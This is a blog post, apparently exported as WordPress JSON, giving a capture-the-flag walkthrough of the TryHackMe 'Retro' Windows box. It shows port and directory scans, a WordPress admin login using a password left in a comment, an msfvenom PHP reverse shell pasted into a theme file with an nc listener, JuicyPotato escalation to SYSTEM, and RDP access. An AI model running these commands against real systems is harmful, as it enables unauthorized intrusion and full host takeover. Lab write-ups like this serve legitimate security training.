{"id":220,"date":"2020-06-19T20:32:16","date_gmt":"2020-06-19T12:32:16","guid":{"rendered":"https:\/\/byy3.com\/?p=220"},"modified":"2020-06-19T21:38:39","modified_gmt":"2020-06-19T13:38:39","slug":"retro-for-ctf-of-wordpress","status":"publish","type":"post","link":"https:\/\/byy3.com\/?p=220","title":{"rendered":"Retro for CTF of wordpress"},"content":{"rendered":"\n
Retro\u00a0is a free Windows box offered .<\/p>\n\n\n\n
What you\u2019ll learn<\/h3>\n\n\n\n
Importance of different wordlists<\/li>
Consequence of SeImpersonatePrivilege<\/li><\/ul>\n\n\n\n
Port scans<\/h3>\n\n\n\n
One thing I noticed with is that the openvpn tunnel created is a\u00a0tun0<\/strong>\u00a0interface, rather than\u00a0tap0<\/strong>\u00a0or the hypervisor-created\u00a0eth0<\/strong>. This poses some problems for Unicornscan which seems to work over a network-L2 interface but not a L3 one. This was discussed in a\u00a0HTB thread here. Unicornscan gave the error<\/p>\n\n\n\n
Send exiting main didnt connect, exiting: system error Interrupted system call<\/pre>\n\n\n\nConsequently I stuck with masscan, which worked for TCP scans. UDP scans, well are protocol-based and don\u2019t seem to work for most scanners, including nmap (see here<\/a> for an open TFTP port nmap didn\u2019t detect). nmap is probably your best chance though.<\/p>\n\n\n\n
root@Kali:~\/TryHackme\/Retro# masscan -p1-65535,U:1-65535 10.10.208.121 --rate=600 -e tun0\n\nStarting masscan 1.0.4 (http:\/\/bit.ly\/14GZzcT) at 2020-03-28 13:32:10 GMT\n -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth\nInitiating SYN Stealth Scan\nScanning 1 hosts [131070 ports\/host]\nDiscovered open port 80\/tcp on 10.10.208.198 \nDiscovered open port 3389\/tcp on 10.10.208.198 \n<\/pre>\n\n\n\nJust two ports. Perfect. TCP service scan here<\/a>. There seems to be nothing special though, from the nmap results.<\/p>\n\n\n\n
Web scans<\/h3>\n\n\n\nThis seemed to return nothing too.<\/p>\n\n\n\namap v5.4 (www.thc.org\/thc-amap) started at 2020-03-28 21:54:36 - APPLICATION MAPPING mode\n\nProtocol on 10.10.208.198:80\/tcp matches http\nProtocol on 10.10.208.198:80\/tcp matches http-apache-2\nProtocol on 10.10.208.198:80\/tcp matches http-iis\n\nUnidentified ports: none.\n\namap v5.4 finished at 2020-03-28 21:54:36\n\n\nroot@Kali:~\/TryHackme\/Retro# gobuster dir -u http:\/\/10.10.208.198:80 -w \/usr\/share\/dirb\/wordlists\/common.txt\n===============================================================\nGobuster v3.0.1\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)\n===============================================================\n[+] Url: http:\/\/10.10.208.198:80\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/dirb\/wordlists\/common.txt\n[+] Status codes: 200,204,301,302,307,401,403\n[+] User Agent: gobuster\/3.0.1\n[+] Timeout: 10s\n===============================================================\n2020\/03\/28 21:55:16 Starting gobuster\n===============================================================\n===============================================================\n2020\/03\/28 21:56:47 Finished\n===============================================================\n\nRouted through Burp, use old header\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n\nroot@Kali:~\/TryHackme\/Retro# gobuster dir -u http:\/\/10.10.208.198:80 -w \/usr\/share\/dirb\/wordlists\/common.txt -p http:\/\/localhost:8081\n===============================================================\nGobuster v3.0.1\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)\n===============================================================\n[+] Url: http:\/\/10.10.208.198:80\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/dirb\/wordlists\/common.txt\n[+] Status codes: 200,204,301,302,307,401,403\n[+] Proxy: http:\/\/localhost:8081\n[+] User Agent: gobuster\/3.0.1\n[+] Timeout: 10s\n===============================================================\n2020\/03\/28 22:04:01 Starting gobuster\n===============================================================\n===============================================================\n2020\/03\/28 22:08:03 Finished\n===============================================================\n<\/pre>\n\n\n\nTook me some time, but apparently the wordlist used I used was insufficient. If I had used \/usr\/share\/dirbuster\/wordlists\/directory-list-2.3-medium.txt<\/code> instead I would have found this.<\/p>\n\n\n\nroot@Kali:~\/TryHackme\/Retro# gobuster dir -u http:\/\/192.168.92.134:80 -w \/usr\/share\/dirbuster\/wordlists\/directory-list-2.3-medium.txt\n===============================================================\nGobuster v3.0.1\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)\n===============================================================\n[+] Url: http:\/\/10.10.218.121:80\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/dirbuster\/wordlists\/directory-list-2.3-medium.txt\n[+] Status codes: 200,204,301,302,307,401,403\n[+] User Agent: gobuster\/3.0.1\n[+] Timeout: 10s\n===============================================================\n2020\/03\/29 14:57:25 Starting gobuster\n===============================================================\n\/retro (Status: 301)\n\/Retro (Status: 301)\n===============================================================\n2020\/03\/29 14:57:43 Finished\n===============================================================\n<\/pre>\n\n\n\nThat or got the hint somehow that the name of the box could be an important Web path. Further scanning down this path gave<\/p>\n\n\n\nroot@Kali:~\/TryHackme\/Retro# gobuster dir -u http:\/\/10.10.208.121:80\/retro -w \/usr\/share\/dirb\/wordlists\/common.txt\n===============================================================\nGobuster v3.0.1\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)\n===============================================================\n[+] Url: http:\/\/10.10.208.121:80\/retro\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/dirb\/wordlists\/common.txt\n[+] Status codes: 200,204,301,302,307,401,403\n[+] User Agent: gobuster\/3.0.1\n[+] Timeout: 10s\n===============================================================\n2020\/03\/28 22:15:06 Starting gobuster\n===============================================================\n\/index.php (Status: 301)\n\/wp-admin (Status: 301)\n\/wp-content (Status: 301)\n\/wp-includes (Status: 301)\n===============================================================\n2020\/03\/28 22:16:39 Finished\n===============================================================\n<\/pre>\n\n\n\nSo we have a WP blog. But for some reason with Burp as proxy I kept getting re-directed to localhost:80 which of course loaded nothing so I had to do this to redirect it back.<\/p>\n\n\n\nroot@Kali:~\/TryHackme\/Retro# ssh -L 80:10.10.208.121:80 localhost\nroot@localhost's password: \nLinux Kali 4.19.0-kali5-amd64 #1 SMP Debian 4.19.37-2kali1 (2019-05-15) x86_64\n\nThe programs included with the Kali GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nKali GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nNo mail.\nLast login: Sat Mar 28 20:35:25 2020 from ::1\n<\/pre>\n\n\n\nThat\u2019s SSH local port forwarding where you connect one of your machine own ports to a remote servers\u2019 other port, like<\/a><\/p>\n\n\n\n
ssh -L 8080:www.ubuntuforums.org:80 localhost<\/pre>\n\n\n\nNow you can visit http:\/\/localhost:8080<\/a> to go to http:\/\/www.ubuntuforums.org:80<\/a><\/p>\n\n\n\n
After doing this I could visit http:\/\/10.10.208.121\/retro\/wp-admin<\/a><\/code>. If you didn\u2019t encounter this problem don\u2019t do this. After I upgraded Burpsuite, the problem stopped. The site looks like this<\/p>\n\n\n\n
<\/figure>\n\n\n\nNow I had to specify all my scans to direct to localhost:80 Since we have a WP site I did wpscan, which annoyingly upgraded to a freemium model limited to 5 results per day. Results here<\/a>. This didn\u2019t lead anywhere since the vulnerabilities identified were XSS or required you already had some login access to the WP site.<\/p>\n\n\n\n
WordPress login<\/h3>\n\n\n\nThe only way forward, was to notice this comment.<\/p>\n\n\n\n<\/figure>\n\n\n\nwhich said<\/p>\n\n\n\nWade\nDecember 9, 2019\nLeaving myself a note here just in case I forget how to spell it: parzival<\/pre>\n\n\n\nIf you try it on the WordPress admin login page (\/retro\/wp-login.php) it works (user: Wade, Password = parzival)<\/p>\n\n\n\nExploitation<\/h3>\n\n\n\nChecking the Users section, we see quickly that Wade is a WP admin. Great.<\/p>\n\n\n\n<\/figure>\n\n\n\nThat means we have rights to edit WP themes and replace it with our own code. Typically the WordPress exploitation to shell vector requres two things.<\/p>\n\n\n\nUploading a reverse Web shell.<\/li>LFI or able to browse to view that shell.<\/li><\/ol>\n\n\n\nThe theme used is 90\u2019s retro. Going to Apperance -> Theme Editor we can choose whichever page to edit. The best choice is usually 404.php since that page loads whenever a non-existent Web page is queried on the WP site and it gets redirected there, triggering the reverse shell. But this time, I chose another page, page.php<\/strong>.<\/p>\n\n\n\n
Now we just need a PHP reverse shell, so get it via msfvenom.<\/p>\n\n\n\nroot@Kali:~\/TryHackme\/Retro# msfvenom -a php --platform php -p php\/reverse_php LHOST=10.9.21.147 LPORT=443 -o shell.php\nNo encoder or badchars specified, outputting raw payload\nPayload size: 3044 bytes\nSaved as: shell.php\n<\/pre>\n\n\n\n<\/figure>\n\n\n\nJust copy and paste the entire PHP code, overwriting the existing code completely. Don\u2019t leave any of the original code behind. I say this because when I first did it, I couldn\u2019t get the reverse shell to trigger until I completely overwrote it. Ok, now we just need to find a way to view page.php Where could that be?<\/p>\n\n\n\n
Now I could access twentynineteen theme readme.txt here<\/p>\n\n\n\n
http:\/\/10.10.218.121\/retro\/wp-content\/themes\/twentynineteen\/readme.txt<\/pre>\n\n\n\nso I just need to figure out Web path for 90\u2019s Retro theme. After some Googling, I found its Github repo<\/a>. The URL suggested the path could be \/90s-retro\/<\/code>. Accessing http:\/\/10.10.218.121\/retro\/wp-content\/themes\/90s-retro\/readme.txt<\/a><\/code> works! So the uploaded reverse shell would be at http:\/\/10.10.218.121\/retro\/wp-content\/themes\/90s-retro\/page.php<\/a><\/code><\/p>\n\n\n\n
root@Kali:~\/TryHackme\/Retro# curl http:\/\/10.10.218.121\/retro\/wp-content\/themes\/90s-retro\/page.php<\/pre>\n\n\n\nOur listener (I switched from port 53 to 443 with another shell)<\/p>\n\n\n\nroot@Kali:~\/TryHackme\/Retro# rlwrap -r nc -nlvp 443\nlistening on [any] 443 ...\nconnect to [10.9.21.147] from (UNKNOWN) [10.10.208.121] 52344\nwhoami && ipconfig \/all\nnt authority\\iusr\n\nWindows IP Configuration\n\n Host Name . . . . . . . . . . . . : RetroWeb\n Primary Dns Suffix . . . . . . . : \n Node Type . . . . . . . . . . . . : Hybrid\n IP Routing Enabled. . . . . . . . : No\n WINS Proxy Enabled. . . . . . . . : No\n DNS Suffix Search List. . . . . . : eu-west-1.ec2-utilities.amazonaws.com\n eu-west-1.compute.internal\n\nEthernet adapter Ethernet:\n\n Connection-specific DNS Suffix . : eu-west-1.compute.internal\n Description . . . . . . . . . . . : AWS PV Network Device #0\n Physical Address. . . . . . . . . : 02-95-6F-53-23-2E\n DHCP Enabled. . . . . . . . . . . : Yes\n Autoconfiguration Enabled . . . . : Yes\n Link-local IPv6 Address . . . . . : fe80::8d1d:a2be:a594:99d7%5(Preferred) \n IPv4 Address. . . . . . . . . . . : 10.10.208.198(Preferred) \n Subnet Mask . . . . . . . . . . . : 255.255.0.0\n Lease Obtained. . . . . . . . . . : Saturday, March 28, 2020 6:29:56 AM\n Lease Expires . . . . . . . . . . : Saturday, March 28, 2020 8:29:56 AM\n Default Gateway . . . . . . . . . : 10.10.0.1\n DHCP Server . . . . . . . . . . . : 10.10.0.1\n DHCPv6 IAID . . . . . . . . . . . : 100805359\n DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-7F-AD-F0-00-0C-29-6C-C0-28\n DNS Servers . . . . . . . . . . . : 10.0.0.2\n NetBIOS over Tcpip. . . . . . . . : Enabled\n\nTunnel adapter Teredo Tunneling Pseudo-Interface:\n\n Connection-specific DNS Suffix . : \n Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface\n Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\n DHCP Enabled. . . . . . . . . . . : No\n Autoconfiguration Enabled . . . . : Yes\n IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:ce5:276b:f5f5:2f39(Preferred) \n Link-local IPv6 Address . . . . . : fe80::ce5:276b:f5f5:2f39%2(Preferred) \n Default Gateway . . . . . . . . . : ::\n DHCPv6 IAID . . . . . . . . . . . : 134217728\n DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-7F-AD-F0-00-0C-29-6C-C0-28\n NetBIOS over Tcpip. . . . . . . . : Disabled\n\nTunnel adapter isatap.eu-west-1.compute.internal:\n\n Media State . . . . . . . . . . . : Media disconnected\n Connection-specific DNS Suffix . : eu-west-1.compute.internal\n Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2\n Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\n DHCP Enabled. . . . . . . . . . . : No\n Autoconfiguration Enabled . . . . : Yes\n<\/pre>\n\n\n\nAs per other walkthroughs, the credentials work for RDP too, the other open port on the box. If you\u2019re going down that route, I prefer FreeRDP over rdesktop. This command is my go to<\/p>\n\n\n\nroot@Kali:~\/TryHackme\/Retro# xfreerdp \/v:10.10.218.121:3389 \/u:Wade \/p:parzival \/size:90%<\/pre>\n\n\n\nWhere \/size scales it to 90% of your desktop resolution. Experiment and see what works for you. Just for the record, I tried other PHP reverse shells such as this<\/a> and Pentestmonkey\u2019s (replacing with cmd) but it didn\u2019t work. Only msfvenom\u2019s worked for me.<\/p>\n\n\n\n
Post-exploitation<\/h3>\n\n\n\nThere are a few ways to achieve SYSTEM here. The intended method, explained here<\/a> didn\u2019t work for me. What worked was a kernel exploit specific to this version of Windows or the Juicy Potato exploit. First note our privileges (we are IUSR or the IIS user). winPEAS highlights this too.<\/p>\n\n\n\n
whoami \/all\n\nUSER INFORMATION\n----------------\n\nUser Name SID \n================= ========\nnt authority\\iusr S-1-5-17\n\n\nGROUP INFORMATION\n-----------------\n\nGroup Name Type SID Attributes \n==================================== ================ ============ ==================================================\nMandatory Label\\High Mandatory Level Label S-1-16-12288 \nEveryone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\SERVICE Well-known group S-1-5-6 Group used for deny only \nCONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group\nLOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group\n\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name Description State \n======================= ========================================= =======\nSeChangeNotifyPrivilege Bypass traverse checking Enabled\nSeImpersonatePrivilege Impersonate a client after authentication Enabled\nSeCreateGlobalPrivilege Create global objects Enabled\n<\/pre>\n\n\n\nWe have SeImpersonatePrivilege<\/strong> privileges. So that means we can use Juicy Potato. Call it like this<\/p>\n\n\n\n
JuicyPotato.exe -l 443 -p C:\\inetpub\\wwwroot\\retro\\wp-content\\themes\\90s-retro\\temp\\shell443.exe -t * -c {5B3E6773-3A99-4A3D-8096-7765DD11785C}\nTesting {5B3E6773-3A99-4A3D-8096-7765DD11785C} 443\n......\n[+] authresult 0\n{5B3E6773-3A99-4A3D-8096-7765DD11785C};NT AUTHORITY\\SYSTEM\n\n[+] CreateProcessWithTokenW OK\n<\/pre>\n\n\n\nWe should get a SYSTEM shell<\/p>\n\n\n\n
root@Kali:~\/TryHackme\/Retro# rlwrap -r nc -nlvp 443\nlistening on [any] 443 ...\nconnect to [10.9.21.147] from (UNKNOWN) [10.10.218.121] 50079\nMicrosoft Windows [Version 10.0.14393]\n(c) 2016 Microsoft Corporation. All rights reserved.\n\nC:\\Windows\\system32>whoami \/priv && ipconfig\nwhoami \/priv && ipconfig\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name Description State \n========================================= ================================================================== =======\nSeAssignPrimaryTokenPrivilege Replace a process level token Enabled\nSeLockMemoryPrivilege Lock pages in memory Enabled\nSeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled\nSeTcbPrivilege Act as part of the operating system Enabled\nSeSecurityPrivilege Manage auditing and security log Enabled\nSeTakeOwnershipPrivilege Take ownership of files or other objects Enabled\nSeLoadDriverPrivilege Load and unload device drivers Enabled\nSeSystemProfilePrivilege Profile system performance Enabled\nSeSystemtimePrivilege Change the system time Enabled\nSeProfileSingleProcessPrivilege Profile single process Enabled\nSeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled\nSeCreatePagefilePrivilege Create a pagefile Enabled\nSeCreatePermanentPrivilege Create permanent shared objects Enabled\nSeBackupPrivilege Back up files and directories Enabled\nSeRestorePrivilege Restore files and directories Enabled\nSeShutdownPrivilege Shut down the system Enabled\nSeDebugPrivilege Debug programs Enabled\nSeAuditPrivilege Generate security audits Enabled\nSeSystemEnvironmentPrivilege Modify firmware environment values Enabled\nSeChangeNotifyPrivilege Bypass traverse checking Enabled\nSeUndockPrivilege Remove computer from docking station Enabled\nSeManageVolumePrivilege Perform volume maintenance tasks Enabled\nSeImpersonatePrivilege Impersonate a client after authentication Enabled\nSeCreateGlobalPrivilege Create global objects Enabled\nSeIncreaseWorkingSetPrivilege Increase a process working set Enabled\nSeTimeZonePrivilege Change the time zone Enabled\nSeCreateSymbolicLinkPrivilege Create symbolic links Enabled\nSeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled\n\nWindows IP Configuration\n\n\nEthernet adapter Ethernet:\n\n Connection-specific DNS Suffix . : eu-west-1.compute.internal\n Link-local IPv6 Address . . . . . : fe80::acad:1add:8c0f:6899%5\n IPv4 Address. . . . . . . . . . . : 10.10.218.121\n Subnet Mask . . . . . . . . . . . : 255.255.0.0\n Default Gateway . . . . . . . . . : 10.10.0.1\n\nTunnel adapter Teredo Tunneling Pseudo-Interface:\n\n Connection-specific DNS Suffix . : \n IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:3874:3db0:f5f5:2586\n Link-local IPv6 Address . . . . . : fe80::3874:3db0:f5f5:2586%2\n Default Gateway . . . . . . . . . : ::\n\nTunnel adapter isatap.eu-west-1.compute.internal:\n\n Media State . . . . . . . . . . . : Media disconnected\n Connection-specific DNS Suffix . : eu-west-1.compute.internal\n<\/pre>\n","protected":false},"excerpt":{"rendered":"Retro\u00a0is a free Windows box offered . What you\u2019ll learn […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-220","post","type-post","status-publish","format-standard","hentry","category-net-security"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/220","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=220"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/220\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=220"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=220"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=220"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}